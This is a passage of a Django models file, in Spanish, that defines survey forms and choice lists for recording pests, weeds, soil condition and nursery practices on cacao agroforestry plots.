("J", 'Comején'),
("K", 'Minador de la hoja'),
("L", 'Lana'),
("M", 'Ardillaa'),
("N", 'Bejuco'),
("O", 'Tanda'),
)
CHOICE_SITUACION_PLAGAS = (
(1, 'Varias plagas en todos los puntos'),
(2, 'Varias plagas en algunos puntos'),
(3, 'Pocas plagas en todos los puntos'),
(4, 'Pocas plagas en algunos puntos'),
(5, 'Una plaga en todos los puntos'),
(6, 'Una plaga en algunos puntos'),
)
class ProblemasPrincipales(models.Model):
observadas = MultiSelectField(choices=CHOICE_ENFERMEDADES,
verbose_name='Las plagas y enfermedades observadas en la parcela')
situacion = models.IntegerField(choices=CHOICE_SITUACION_PLAGAS,blank=True, null=True)
principales = MultiSelectField(choices=CHOICE_ENFERMEDADES,
verbose_name='Las plagas y enfermedades principales en la parcela')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"problemas principales"
CHOICE_ENFERMEDADES_PUNTO6_1 = (
("A", 'Suelo erosionado'),
("B", 'Suelo poco fértil'),
("C", 'Mucha competencia'),
("D", 'Mal drenaje'),
("E", 'Falta obras de conservación'),
("F", 'Suelo compacto'),
("G", 'Suelo con poca MO'),
("H", 'No usa abono o fertilizante'),
)
CHOICE_ENFERMEDADES_PUNTO6_2 = (
(1, 'Sombra muy densa'),
(2, 'Sombra muy rala'),
(3, 'Sombra mal distribuida'),
(4, 'Arboles de sombra no adecuada'),
(5, 'Mucha auto-sombra'),
(6, 'Mucho banano'),
)
CHOICE_ENFERMEDADES_PUNTO6_3 = (
("A", 'Poda no adecuada'),
("B", 'Piso no manejado'),
("C", 'No eliminan mazorcas enfermas'),
("D", 'No hay manejo de plagas'),
("E", 'Plantas desnutridas'),
("F", 'Plantación vieja'),
("G", 'Variedades susceptibles'),
("H", 'Variedades no productivas'),
)
class Punto6Plagas(models.Model):
observaciones = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO6_1,
verbose_name='Observaciones de suelo ')
sombra = models.IntegerField(choices=CHOICE_ENFERMEDADES_PUNTO6_2,
verbose_name="Observaciones de sombra", blank=True, null=True)
manejo = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO6_3,
verbose_name='Observaciones de manejo ')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 6"
CHOICE_ACCIONES_PUNTO7_1 = (
(1, 'Recuento de plagas'),
(2, 'Cortar las mazorcas enfermas'),
(3, 'Abonar las plantas'),
(4, 'Aplicar Caldos'),
(5, 'Aplicar Fungicidas'),
(6, 'Manejo de sombra'),
(7, 'Podar las plantas de cacao'),
(8, 'Aplicar venenos para Zompopo'),
(9, 'Control de Comején'),
)
CHOICE_ACCIONES_PUNTO7_2 = (
(1, 'Toda la parcela'),
(2, 'Alguna parte de la parcela'),
)
class Punto7Plagas(models.Model):
manejo = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_1,
verbose_name="Manejo de plagas y enfermedades", blank=True, null=True)
parte = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_2,
verbose_name="En que parte", blank=True, null=True)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses vamos a realizar el manejo')
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 7"
CHOICE_ENFERMEDADES_PUNTO8 = (
("A", 'Medial Luna'),
("B", 'Tijera'),
("C", 'Serrucho'),
("D", 'Bomba de mochila'),
("E", 'Barril'),
("F", 'Cutacha'),
("G", 'No tiene'),
("H", 'Coba'),
)
class Punto8y9Plagas(models.Model):
equipos = MultiSelectField(choices=CHOICE_ENFERMEDADES_PUNTO8,
verbose_name='8.¿Tenemos los equipos necesarios para realizar manejo de plagas y enfermedades?')
opcion = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="9.¿Tenemos la formación para realizar el manejo de plagas y enfermedades?",
blank=True, null=True)
ficha = models.ForeignKey(FichaPlaga)
def __unicode__(self):
return u"punto 8 y 9"
#------------------------------ fin de ficha de plagas -------------------------------
class FichaPiso(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_piso')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_piso')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha piso"
verbose_name_plural = "Fichas piso"
CHOICE_PISO1 = (
("A", 'Zacates o matas de hoja angosta'),
("B", 'Arbustos o plantas de hoja ancha'),
("C", 'Coyol o Coyolillo'),
("D", 'Bejucos'),
("E", 'Tanda'),
("F", 'Cobertura de hoja ancha'),
("G", 'Cobertura de hoja angosta'),
)
class PisoPunto1(models.Model):
punto1 = MultiSelectField(choices=CHOICE_PISO1,
verbose_name='1.¿Cuáles son las hierbas qué cubren el piso y sube sobre las planta de cacao? ')
punto2 = MultiSelectField(choices=CHOICE_PISO1,
verbose_name='2.¿Cuáles son las hierbas qué usted considera dañino? ')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"piso 1 y 2"
CHOICE_PISO3 = (
(1, 'Recuento de malezas'),
(2, 'Chapoda tendida'),
(3, 'Chapoda selectiva'),
(4, 'Aplicar herbicidas total'),
(5, 'Aplicar herbicidas en parches'),
(6, 'Manejo de bejuco'),
(7, 'Manejo de tanda'),
(8, 'Regulación de sombra'),
)
class PisoPunto3(models.Model):
manejo = models.IntegerField(choices=CHOICE_PISO3,
verbose_name="Manejo de piso",
blank=True, null=True)
realiza = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="Realiza en manejo",
blank=True, null=True)
veces = models.FloatField("Cuantas veces realizan el manejo")
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses vamos a realiza el manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 3"
CHOICE_PISO4 = (
("A", 'Técnico'),
("B", 'Casa comercial'),
("C", 'Cooperativa'),
("D", 'Otros productores'),
("E", 'Experiencia propia/costumbres'),
("F", 'Otros medio de comunicación'),
)
class PisoPunto4(models.Model):
manejo = MultiSelectField(choices=CHOICE_PISO4,
verbose_name='4.¿De dónde viene su orientación de manejo de malas hierbas?')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 4"
CHOICE_PISO5 = (
(1, 'Zacate anual'),
(2, 'Zacate perene'),
(3, 'Hoja ancha anual'),
(4, 'Hoja ancha perenne'),
(5, 'Ciperácea o Coyolillo'),
(6, 'Bejucos en suelo'),
(7, 'Cobertura hoja ancha'),
(8, 'Cobertura hoja angosta'),
(9, 'Hojarasca'),
(10, 'Mulch de maleza'),
(11, 'Suelo desnudo')
)
class PisoPunto5(models.Model):
estado = models.IntegerField(choices=CHOICE_PISO5,
verbose_name="Estado de Piso",
blank=True, null=True)
conteo = models.FloatField('Conteo (números)')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 5"
CHOICE_PISO6_1 = (
("A", 'Sin competencia'),
("B", 'Media competencia'),
("C", 'Alta competencia'),
)
CHOICE_PISO6_2 = (
(1, 'Piso cubierto pero compite'),
(2, 'Piso medio cubierto y compite'),
(3, 'Piso no cubierto'),
(4, 'Piso con mucho bejuco'),
(5, 'Plantas con bejuco'),
(6, 'Plantas con tanda'),
)
CHOICE_PISO6_3 = (
("A", 'Zacate anual'),
("B", 'Zacate perene'),
("C", 'Hoja ancha anual'),
("D", 'Hoja ancha perenne'),
("E", 'Ciperácea o Coyolillo'),
("F", 'Bejucos'),
)
class PisoPunto6(models.Model):
manejo = MultiSelectField(choices=CHOICE_PISO6_1,
verbose_name='La competencia entre malas hierbas y las plantas de cacao?')
estado = models.IntegerField(choices=CHOICE_PISO6_2,
verbose_name="La cobertura del piso de cacaotal",
blank=True, null=True)
maleza = MultiSelectField(choices=CHOICE_PISO6_3,
verbose_name='Tipo de malezas que compiten')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 6"
CHOICE_PISO7_1 = (
("A", 'Suelo erosionado'),
("B", 'Suelo poco fértil'),
("C", 'Mal drenaje'),
("D", 'Suelo compacto'),
("E", 'Suelo con poca MO'),
("F", 'No usa abono o fertilizante'),
)
CHOICE_PISO7_2 = (
("A", 'Sombra muy rala'),
("B", 'Sombra mal distribuida'),
("C", 'Arboles de sombra no adecuada'),
("D", 'Poco banano'),
)
CHOICE_PISO7_3 = (
("A", 'Chapoda no adecuada'),
("B", 'Chapoda tardía'),
("C", 'No hay manejo selectivo'),
("D", 'Plantas desnutridas'),
("E", 'Plantación vieja'),
("F", 'Mala selección de herbicidas'),
)
class PisoPunto7(models.Model):
suelo = MultiSelectField(choices=CHOICE_PISO7_1,
verbose_name='Observaciones de suelo ')
sombra = MultiSelectField(choices=CHOICE_PISO7_2,
verbose_name='Observaciones de sombra')
manejo = MultiSelectField(choices=CHOICE_PISO7_3,
verbose_name='Observaciones de manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 7"
CHOICE_PISO8 = (
(1, 'Recuento de malezas'),
(2, 'Chapoda tendida'),
(3, 'Chapoda selectiva'),
(4, 'Aplicar herbicidas total'),
(5, 'Aplicar herbicidas en parches'),
(6, 'Manejo de bejuco'),
(7, 'Manejo de tanda'),
(8, 'Regulación de sombra'),
)
class PisoPunto8(models.Model):
piso = models.IntegerField(choices=CHOICE_PISO8,
verbose_name="Manejo de piso",
blank=True, null=True)
parte = models.IntegerField(choices=CHOICE_ACCIONES_PUNTO7_2,
verbose_name="En que parte",
blank=True, null=True)
meses = MultiSelectField(choices=CHOICES_FECHA_PODA,
verbose_name='En qué meses vamos a realizar el manejo')
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 8"
CHOICE_PISO10 = (
("A", 'Machete'),
("B", 'Pico'),
("C", 'Pala'),
("D", 'Bomba de mochila'),
("E", 'Barril'),
("F", 'Cutacha'),
("G", 'No tiene'),
("H", 'Coba'),
)
class PisoPunto10(models.Model):
equipo = MultiSelectField(choices=CHOICE_PISO10,
verbose_name='10.¿Tenemos los equipos necesarios para realizar manejo de piso?')
formacion = models.IntegerField(choices=CHOICE_SI_NO,
verbose_name="11.¿Tenemos la formación para realizar el manejo de piso?",
blank=True, null=True)
ficha = models.ForeignKey(FichaPiso)
def __unicode__(self):
return u"punto 10 y 11"
#-------------------------- entradas de suelo ----------------------------------
class FichaSuelo(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_suelo')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_suelo')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha suelo"
verbose_name_plural = "Ficha suelo"
CHOICE_SUELO_USO_PARCELA = (
(1, 'Bosque'),
(2, 'Potrero'),
(3, 'Granos básicos'),
(4, 'Tacotal'),
(5, 'Cacaotal viejo'),
)
CHOICE_SUELO_LIMITANTES = (
('A', 'Acidez / pH del suelo '),
('B', 'Encharcamiento / Mal Drenaje'),
('C', 'Enfermedades de raíces '),
('D', 'Deficiencia de nutrientes'),
('E', 'Baja materia orgánica'),
('F', 'Baja actividad biológica y presencia de lombrices'),
('G', 'Erosión'),
('H', 'Compactación e infiltración de agua'),
)
CHOICE_SUELO_ORIENTACION = (
('A', 'Técnico'),
('B', 'Casa comercial'),
('C', 'Cooperativa'),
('D', 'Otros productores'),
('E', 'Experiencia propia/costumbres'),
('F', 'Otros medio de comunicación'),
('G', 'Análisis de suelo '),
('H', 'Otros '),
)
CHOICE_SUELO_ABONOS = (
('A', 'Hecho en finca (compost, estiércol)'),
('B', 'Regalados de otra finca (compost, estiércol)'),
('C', 'Comprados de otra finca (compost, estiércol)'),
('D', 'Comprado de casa comercial'),
('E', 'Con crédito de la cooperativa'),
('F', 'Incentivos/Regalados'),
('G', 'No aplica'),
)
class Punto1Suelo(models.Model):
uso_parcela = models.IntegerField(choices=CHOICE_SUELO_USO_PARCELA,
verbose_name="Cuál era el uso de la parcela antes de establecer el cacao?")
limitante = MultiSelectField(choices=CHOICE_SUELO_LIMITANTES,
verbose_name='Cuáles son los limitantes productivos del suelo de la parcela?')
orientacion = MultiSelectField(choices=CHOICE_SUELO_ORIENTACION,
verbose_name='Quien su orientación de manejo de fertilidad de suelo?')
abonos = MultiSelectField(choices=CHOICE_SUELO_ABONOS,
verbose_name='4. De donde consigue los abonos, fertilizantes y enmiendas de suelo?')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 1"
class Meta:
verbose_name = 'Historial de manejo y limitaciones observados'
verbose_name_plural = 'Historial de manejo y limitaciones observados'
CHOICE_SUELO_EROSION_OPCION = (
(1, 'Deslizamientos'),
(2, 'Evidencia de erosión'),
(3, 'Cárcavas'),
(4, 'Área de acumulación de sedimentos'),
(5, 'Pedregosidad'),
(6, 'Raíces desnudos'),
)
CHOICE_SUELO_EROSION_RESPUESTA = (
(1, 'No presente'),
(2, 'Algo'),
(3, 'Severo'),
)
class PuntoASuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_EROSION_OPCION,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_EROSION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Indicadores de erosión"
class Meta:
verbose_name = 'Indicadores de erosión'
verbose_name_plural = 'Indicadores de erosión'
CHOICE_SUELO_CONSERVACION_OPCION = (
(1, 'Barrera muertas'),
(2, 'Barrera Viva'),
(3, 'Siembra en Curvas a Nivel'),
(4, 'Terrazas'),
(5, 'Cobertura de piso'),
)
CHOICE_SUELO_CONSERVACION_RESPUESTA = (
(1, 'No presente'),
(2, 'En mal estado'),
(3, 'En buen estado'),
)
class PuntoBSuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_OPCION,
verbose_name="Obras")
respuesta = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Obras de conservación de suelo"
class Meta:
verbose_name = 'Obras de conservación de suelo'
verbose_name_plural = 'Obras de conservación de suelo'
CHOICE_SUELO_DRENAJE_OPCION = (
(1, 'Encharcamientos'),
(2, 'Amarillamiento/mal crecimiento'),
(3, 'Enfermedades (phytophthora)'),
)
class Punto2ASuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_DRENAJE_OPCION,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_EROSION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Indicadores de drenaje"
class Meta:
verbose_name = 'Indicadores de drenaje'
verbose_name_plural = 'Indicadores de drenaje'
CHOICE_SUELO_DRENAJE_OPCION2 = (
(1, 'Acequias'),
(2, 'Canales de drenaje a lo largo y ancho de la parcela'),
(3, 'Canales de drenaje alrededor de las plantas'),
(4, 'Canales a lado de la parcela'),
(5, 'Cobertura de piso'),
)
class Punto2BSuelo(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_DRENAJE_OPCION2,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_CONSERVACION_RESPUESTA,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Obras de drenaje"
class Meta:
verbose_name = 'Obras de drenaje'
verbose_name_plural = 'Obras de drenaje'
CHOICE_SUELO_OPCION_PUNTOS = (
(1, 'Severidad de daño de nematodos'),
(2, 'Severidad de daño de hongos'),
)
CHOICE_SUELO_RESPUESTA_PUNTOS = (
(1, 'No Afectado'),
(2, 'Afectado'),
(3, 'Muy Afectados'),
(4, 'Severamente afectados'),
)
class Punto3SueloPunto1(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 1"
class Meta:
verbose_name = 'Salud de Raíces punto 1'
verbose_name_plural = 'Salud de Raíces punto 1'
class Punto3SueloPunto2(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 2"
class Meta:
verbose_name = 'Salud de Raíces punto 2'
verbose_name_plural = 'Salud de Raíces punto 2'
class Punto3SueloPunto3(models.Model):
opcion = models.IntegerField(choices=CHOICE_SUELO_OPCION_PUNTOS,
verbose_name="Indicadores")
respuesta = models.IntegerField(choices=CHOICE_SUELO_RESPUESTA_PUNTOS,
verbose_name="respuesta")
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Punto 3"
class Meta:
verbose_name = 'Salud de Raíces punto 3'
verbose_name_plural = 'Salud de Raíces punto 3'
class Punto4Suelo(models.Model):
area = models.FloatField(verbose_name='Tamaño de Área de Cacao SAF (en manzanas)')
densidad = models.FloatField(verbose_name='Densidad de Arboles de Cacao en parcela SAF (por manzana)')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Balance de nutrientes de parcela Cacao SAF"
class Meta:
verbose_name = 'Balance de nutrientes de parcela Cacao SAF'
verbose_name_plural = 'Balance de nutrientes de parcela Cacao SAF'
CHOICE_SUELO_PRODUCTO_COSECHA = (
(1, 'Cacao Grano Seco - (qq/mz/año)'),
(2, 'Leña - (cargas de 125lb /mz/año)'),
(3, 'Cabezas de Banano - (cabezas/mz/año)'),
)
class Punto4SueloCosecha(models.Model):
producto = models.IntegerField(choices=CHOICE_SUELO_PRODUCTO_COSECHA)
cantidad = models.FloatField()
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Cosechas del Productos SAF"
class Meta:
verbose_name = 'Cosechas del Productos SAF'
verbose_name_plural = 'Cosechas del Productos SAF'
class Punto4SueloSI(models.Model):
opcion = models.IntegerField(choices=CHOICE_SI_NO)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Se regresa la cascara a la parcela como abono?"
class Meta:
verbose_name = 'Se regresa la cascara a la parcela como abono?'
verbose_name_plural = 'Se regresa la cascara a la parcela como abono?'
class TipoFertilizantes(models.Model):
nombre = models.CharField(max_length=250)
def __unicode__(self):
return u'%s' % (self.nombre)
CHOICE_UNIDAD_MEDIDA_ABONO = ((1,'lb/mz'),(2,'lb/planta '),(3,'oz/planta'),(4,'L/mz'),(5, 'qq/mz'))
class Punto5SueloAbonos(models.Model):
tipo = models.ForeignKey(TipoFertilizantes)
cantidad = models.FloatField('Cantidad(Valor)')
unidad = models.IntegerField(choices=CHOICE_UNIDAD_MEDIDA_ABONO)
humedad = models.FloatField('Humedad (%)')
frecuencia = models.FloatField('Frecuencia (por año)')
meses = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='Meses de aplicación')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF"
class Meta:
verbose_name = 'Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF'
verbose_name_plural = 'Abonos, fertilizantes y Enmiendas aplicadas en la parcela cacao SAF'
class DatosAnalisis(models.Model):
variable = models.CharField(max_length=250)
unidad = models.CharField(max_length=250)
valor_critico = models.FloatField()
def __unicode__(self):
return self.variable
class Punto6AnalisisSuelo(models.Model):
variable = models.ForeignKey(DatosAnalisis)
valor = models.FloatField()
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Datos de análisis de suelo"
class Meta:
verbose_name = 'Datos de análisis de suelo'
verbose_name_plural = 'Datos de análisis de suelo'
class Punto7TipoSuelo(models.Model):
opcion = models.IntegerField(choices=(
(1,'Ultisol (rojo)'),
(2, 'Andisol (volcánico)'),
(3, 'Vertisol'),))
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Tipo de suelo"
class Meta:
verbose_name = 'Tipo de suelo'
verbose_name_plural = 'Tipo de suelo'
class Punto8SueloPropuesta(models.Model):
tipo = models.ForeignKey(TipoFertilizantes)
cantidad = models.FloatField('Cantidad(Valor)')
unidad = models.IntegerField(choices=CHOICE_UNIDAD_MEDIDA_ABONO)
frecuencia = models.FloatField('Frecuencia (por año)')
meses = MultiSelectField(choices=CHOICES_FECHA_PODA, verbose_name='Meses de aplicación')
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Nueva Propuesta de Fertilización Generada"
class Meta:
verbose_name = 'Nueva Propuesta de Fertilización Generada'
verbose_name_plural = 'Nueva Propuesta de Fertilización Generada'
CHOICE_PUNTO9_LIMITACION_1 = (
(1, 'Erosión de Suelo'),
)
CHOICE_PUNTO9_LIMITACION_1_ACCION = (
('A', 'Barrera viva'),
('B', 'Cobertura de suelo'),
('C', 'Barrera Muerta'),
('D', 'Siembra en Curvas a Nivel'),
('E', 'Terrazas'),
)
CHOICE_PUNTO9_LIMITACION_2 = (
(1, 'Mal drenaje y encharamientos'),
)
CHOICE_PUNTO9_LIMITACION_2_ACCION = (
('A', 'Acequias'),
('B', 'Canales de drenaje de larga'),
('C', 'Canales de drenaje alrededor de la parcela'),
)
CHOICE_PUNTO9_LIMITACION_3 = (
(1, 'Deficiencia de Nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_3_ACCION = (
('A', 'Aplicar abonos orgánicos'),
('B', 'Aplicar abonos minerales'),
)
CHOICE_PUNTO9_LIMITACION_4 = (
(1, 'Exceso de nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_4_ACCION = (
('A', 'Bajar nivel de fertilización'),
)
CHOICE_PUNTO9_LIMITACION_5 = (
(1, 'Desbalance de nutrientes'),
)
CHOICE_PUNTO9_LIMITACION_5_ACCION = (
('A', 'Ajustar programa de fertilización '),
)
CHOICE_PUNTO9_LIMITACION_6 = (
(1, 'Enfermedades y plagas de raíces'),
)
CHOICE_PUNTO9_LIMITACION_6_ACCION = (
('A', 'Abonos orgánicos'),
('B', 'Obras de drenaje'),
('C', 'Aplicación de ceniza'),
)
CHOICE_PUNTO9_DONDE = (
(1, 'En todo parcela'),
(2, 'En algunas partes'),
)
class Punto9Erosion(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_1)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_1_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de eroción"
class Meta:
verbose_name = 'Erosión de Suelo'
verbose_name_plural = 'Erosión de Suelo'
class Punto9Drenaje(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_2)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_2_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de mal drenaje"
class Meta:
verbose_name = 'Mal drenaje y encharamientos'
verbose_name_plural = 'Mal drenaje y encharamientos'
class Punto9Nutrientes(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_3)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_3_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de deficiencia nutrientes"
class Meta:
verbose_name = 'Deficiencia de Nutrientes'
verbose_name_plural = 'Deficiencia de Nutrientes'
class Punto9Exceso(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_4)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_4_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de exceso de nutrientes"
class Meta:
verbose_name = 'Exceso de nutrientes'
verbose_name_plural = 'Exceso de nutrientes'
class Punto9Desbalance(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_5)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_5_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de desbalance de nutrientes"
class Meta:
verbose_name = 'Desbalance de nutrientes'
verbose_name_plural = 'Desbalance de nutrientes'
class Punto9Enfermedades(models.Model):
limitaciones = models.IntegerField(choices=CHOICE_PUNTO9_LIMITACION_6)
acciones = MultiSelectField(choices=CHOICE_PUNTO9_LIMITACION_6_ACCION, verbose_name='Acciones potenciales')
donde = models.IntegerField(choices=CHOICE_PUNTO9_DONDE)
ficha = models.ForeignKey(FichaSuelo)
def __unicode__(self):
return u"Toma de decisión con base en las observaciones de enfermedades y plagas"
class Meta:
verbose_name = 'Enfermedades y plagas de raíces'
verbose_name_plural = 'Enfermedades y plagas de raíces'
#------------ fin ficha suelo ---------------------------------
#-------------------- comienza ficha viviero ------------------
class FichaVivero(models.Model):
productor = models.ForeignKey(Persona,
verbose_name='Nombre de productor o productora',
related_name='persona_productor_vivero')
tecnico = models.ForeignKey(Persona,
verbose_name='Nombre de técnico',
related_name='persona_tecnico_vivero')
fecha_visita = models.DateField()
def __unicode__(self):
return self.productor.nombre
class Meta:
verbose_name = "Ficha vivero"
verbose_name_plural = "Ficha vivero"
CHOICE_VIVERO_CONVERSACION_1 = (
('A', 'Enero'),
('B', 'Febrero'),
('C', 'Marzo'),
('D', 'Abril'),
('E', 'Mayo'),
('F', 'Junio'),
('G', 'Julio'),
('H', 'Agosto'),
('I', 'Septiembre'),
('J', 'Octubre'),
('K', 'Noviembre'),
('L', 'Diciembre'),
)
CHOICE_VIVERO_CONVERSACION_2 = (
('A', 'En este momento hay buena semilla'),
('B', 'En este momento hay suficiente agua'),
('C', 'En este momento hay menos plagas'),
('D', 'Nos permite para tener plantas listas para sembrar en el invierno'),
)
CHOICE_VIVERO_CONVERSACION_3 = (
('A', 'Buena altura'),
('B', 'Tallo fuerte'),
('C', 'Buena formación horqueta'),
('D', 'Ramas principales robustas'),
('E', 'Buena producción de frutos (más de 40 frutos por planta)'),
('F', 'Alta tolerancia a plagas y enfermedades'),
('G', 'Más de 40 almendras dentro de la mazorca'),
)
CHOICE_VIVERO_CONVERSACION_4 = (
('A', 'Corte de mazorca madura'),
('B', 'Extracción de almendras'),
('C', 'Selección de almendras de mayor tamaño'),
('D', 'Remoción de mucilago o baba'),
('E', 'Empaque en bolsas plásticas con aserrín semi-húmedo'),
('F', 'Toma en cuenta fases de la luna'),
)
CHOICE_VIVERO_CONVERSACION_5 = (
('A', 'Soleando la tierra'),
('B', 'Aplicando agua caliente'),
('C', 'Aplicando cal o ceniza'),
('D', 'Aplicando venenos'),
('E', 'No desinfecta'),
)
CHOICE_VIVERO_CONVERSACION_6 = (
(1, 'Sola tierra'),
(2, 'Tierra + Arena'),
(3, 'Tierra + Abono orgánico (compost)'),
(4, 'Tierra + abono orgánico + Cal o ceniza'),
(5, 'Tierra + Arena + Cal o Ceniza + Abono orgánico'),
)
CHOICE_VIVERO_CONVERSACION_7 = (
(1, 'Bolsa de 6 X 8 pulgadas '),
(2, 'Bolsa de 8 X 10 pulgadas'),
(3, 'Bolsa de 10 X 12 pulgadas'),
)
CHOICE_VIVERO_CONVERSACION_8 = (
(1, 'Acostado u horizontal'),
(2, 'Parado o Vertical'),
(3, 'De cualquier manera'),
)
CHOICE_VIVERO_CONVERSACION_9 = (
('A', 'Cerca de fuentes de agua'),
('B', 'Cercado protegido de animales'),
('C', 'Terreno plano'),
('D', 'Con buena orientación de los bancos (Este-Oeste)'),
('E', 'Con sombra natural'),
('F', 'Con ramada'),
)
CHOICE_VIVERO_CONVERSACION_10 = (
(1, 'Injerto de yema'),
(2, 'Injerto de cogollo'),
(3, 'Ninguno'),
)
CHOICE_VIVERO_CONVERSACION_12 = (
(1, 'De la misma finca'),
(2, 'De finca vecina'),
(3, 'De Jardín Clonal'),
)
class VivieroConversacion(models.Model):
conversacion1 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_1,
verbose_name='1.¿En qué meses del año planifica o construye viveros para producción de plantas de cacao?')
conversacion2 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_2,
verbose_name='2.¿Por qué hace vivero en estos meses?')
conversacion3 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_3,
verbose_name='3.¿Cuáles son características más deseables para una planta productiva?')
conversacion4 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_4,
verbose_name='4.¿Qué pasos realiza para la preparación de semillas de cacao?')
conversacion5 = MultiSelectField(choices=CHOICE_VIVERO_CONVERSACION_5,
verbose_name='5.¿Con qué desinfecta el suelo para el vivero?')
conversacion6 = models.IntegerField(choices=CHOICE_VIVERO_CONVERSACION_6,
verbose_name='¿Cómo prepara el sustrato para la producción de plantas de cacao en vivero?')
ficha = models.ForeignKey(FichaVivero)
def __unicode__(self):
return u"Conversación con el Productor o productora"
# class Meta:
# verbose_name = 'I.Conversación con el Productor o productora'
